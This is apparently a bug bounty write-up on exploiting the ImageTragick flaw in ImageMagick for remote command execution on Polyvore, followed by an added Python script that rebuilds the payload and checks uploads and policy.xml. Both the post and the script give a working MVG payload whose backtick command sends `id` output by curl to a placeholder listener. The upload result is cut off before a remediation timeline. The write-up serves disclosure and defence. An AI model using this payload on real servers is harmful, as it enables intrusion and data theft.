Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition)
In early May 2016 ImageMagick was assigned CVE-2016-3714, "ImageMagick Delegate Arbitrary Command Execution" (better known as ImageTragick). Let's dig into the vulnerability and how to exploit it. The root cause is that ImageMagick hands the input filename to external "delegate" programs through shell command lines defined in delegates.xml without escaping it; the https delegate, for example, runs curl on the URL. Because ImageMagick identifies a file's format by its content rather than its extension, a text file in ImageMagick's own MVG vector format can be uploaded under a .png name, and an `image` primitive inside it that references an https URL will invoke that delegate with attacker-controlled text on the shell command line. Having ImageMagick installed locally is advised in order to validate the PoC (but not required). For this particular report, I created a file named exploit.png with the following "source code" to get the target's `id`:
    $ cat exploit.png
    push graphic-context
    viewbox 0 0 640 480
    image over 0,0 0,0 'https://127.0.0.1/x.php?x=`id | curl http://SOMEIPADDRESS:8080/ -d @- > /dev/null`'
    pop graphic-context

The backticks sit inside the URL, so when the delegate's command line reaches /bin/sh, `id` runs and its output is POSTed to our listener; the https://127.0.0.1/x.php part never needs to resolve. Now a quick check with ImageMagick to make sure the PoC works: start a nc listener on port 8080, then convert exploit.png to a test file:
    $ convert exploit.png test.png
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100   347    0     0  100   347      0     37  0:00:09  0:00:09 --:--:--     0
    [...]

The progress meter comes from the curl inside the backticks (the delegate's own curl runs with -s), uploading the 347-byte output of `id` to the listener, which confirms the command substitution executed before ImageMagick ever fetched an image.
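As an added example (not code from the original post), the script below builds the same MVG payload, shows the unescaped delegate substitution that makes it work, and adds the two checks a defender would want: sniffing uploads by content instead of extension, and auditing policy.xml for the coders the ImageTragick advisory recommended disabling (EPHEMERAL, URL, HTTPS, MVG, MSL). The delegate template string is modeled on the https entry in delegates.xml of affected builds and the policy.xml fragments are constructed for the example; both are assumptions, and the callback host is the post's placeholder SOMEIPADDRESS.

```python
"""Added example, not part of the original post: build the MVG payload from
the post, show the unescaped delegate substitution that makes it work, and
give two defender-side checks (content sniffing of uploads, policy.xml audit).
"""
import re
import xml.etree.ElementTree as ET

# Assumption: the 'https' delegate template as shipped in delegates.xml of
# affected ImageMagick builds. %o is the output file, %M the input filename
# (the URL minus its scheme); neither is shell-escaped.
HTTPS_DELEGATE_TEMPLATE = '"curl" -s -k -o "%o" "https:%M"'

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Coders the ImageTragick advisory recommended disabling in policy.xml.
REQUIRED_DISABLED_CODERS = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL"}


def build_mvg_payload(callback_host, callback_port=8080):
    """Return the exploit.png contents from the post, parameterized on the
    listener. The .png name is irrelevant: ImageMagick sniffs it as MVG."""
    cmd = "id | curl http://%s:%d/ -d @- > /dev/null" % (callback_host, callback_port)
    url = "https://127.0.0.1/x.php?x=`%s`" % cmd
    return "\n".join([
        "push graphic-context",
        "viewbox 0 0 640 480",
        "image over 0,0 0,0 '%s'" % url,
        "pop graphic-context",
    ]) + "\n"


def extract_image_url(mvg_text):
    """Pull the URL out of the 'image over' primitive, as the MVG coder does."""
    m = re.search(r"image over [\d, ]+ '([^']*)'", mvg_text)
    return m.group(1) if m else None


def delegate_command(url, out_path="/tmp/magick-XXXXXX"):
    """Simulate the vulnerable substitution: the URL is dropped into the
    template verbatim, so backticks survive into the /bin/sh that runs it."""
    rest = url.split(":", 1)[1]          # strip the 'https' scheme
    return HTTPS_DELEGATE_TEMPLATE.replace("%o", out_path).replace("%M", rest)


def shell_injection_in(command):
    """True when the rendered delegate command still carries command
    substitution that /bin/sh would honor."""
    return "`" in command or "$(" in command


def sniff_upload(data):
    """Classify an upload by its bytes, not its extension: 'png', 'mvg' or
    'unknown'. Reject anything that is not what the uploader claims."""
    if data.startswith(PNG_SIGNATURE):
        return "png"
    head = data.lstrip()[:64].lower()
    if head.startswith(b"push graphic-context") or head.startswith(b"viewbox"):
        return "mvg"
    return "unknown"


def policy_gaps(policy_xml):
    """Return the advisory's coders that this policy.xml does NOT disable.
    An empty list means the mitigation is in place (upgrading is still the
    real fix; the policy only blocks the known vectors)."""
    root = ET.fromstring(policy_xml)
    disabled = set()
    for p in root.iter("policy"):
        if p.get("domain") == "coder" and p.get("rights") == "none":
            disabled.add((p.get("pattern") or "").upper())
    return sorted(REQUIRED_DISABLED_CODERS - disabled)


# Constructed policy.xml fragments for the check above (not from any real host).
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
</policymap>"""


if __name__ == "__main__":
    payload = build_mvg_payload("SOMEIPADDRESS")
    cmd = delegate_command(extract_image_url(payload))
    print("delegate runs:", cmd)
    print("injection present:", shell_injection_in(cmd))
    print("upload sniffed as:", sniff_upload(payload.encode()))
    print("weak policy missing:", policy_gaps(WEAK_POLICY))
    print("hardened policy missing:", policy_gaps(HARDENED_POLICY))
```

The sniffing check is the cheap server-side control for uploaders: a file that claims to be PNG but starts with MVG text never reaches ImageMagick. The policy audit is a stopgap for hosts that cannot upgrade immediately; the actual fix is a release of ImageMagick that includes the patch.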
Alright, we have a working PoC. Now let's find a target for it, which brings us to Yahoo. The process should be simple: find an image uploader (e.g. profile images), upload exploit.png, and see what happens. Luckily for me, Polyvore had recently been acquired and added to the Yahoo Bug Bounty scope, and I remembered from previous testing that it had a profile image feature. Uploading exploit.png to Polyvore as my profile image resulted in:
Timeline:
5/4/2016 14:15 - Vulnerability Discovered
5/4/2016 14:35 - Triaged
5/4/2016 15:50 - Fixed